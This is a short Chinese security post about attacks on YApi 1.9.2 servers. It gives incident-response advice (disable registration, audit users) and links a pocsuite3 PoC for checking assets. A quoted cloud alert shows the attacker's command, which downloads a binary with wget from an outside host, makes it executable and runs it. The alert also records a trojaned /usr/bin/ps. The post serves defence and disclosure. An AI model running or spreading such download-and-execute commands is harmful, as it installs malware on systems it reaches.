最近看到有人的YAPI接口管理平台服务器被黑了。发现这个漏洞好像部分还存在,漏洞利用前提还是在注册用户的前提下。所以应急方式也是先关闭注册功能,排查已经注册的用户。看看有没有恶意用户。
版本: 1.9.2
服务器被入侵了, 阿里云报的:
-[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
-[26378] node server/app.js
-[31498] /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
-[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
-[26378] node server/app.js
-[25877] PM2 v4.4.0: God Daemon (/root/.pm2)
-[26378] node server/app.js
-[31498] /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
-[31502] ./20000
-[31503] ./20000
该告警由如下引擎检测发现:
文件路径: /usr/bin/ps
恶意文件md5: c303c2fff08565b7977afccb762e2072
扫描来源方式: 进程启动扫描
进程id: 31969
进程命令行: ps aux
~
~
Centos
截图来自: https://github.com/YMFE/yapi/issues/2229
开源验证的POC,用的pocsuite3框架,方便批量验证。及时验证资产。减少风险暴露。
POC地址:
https://github.com/awake1t/SomePocsuitePoc/blob/main/yapi-1.9.2-poc.py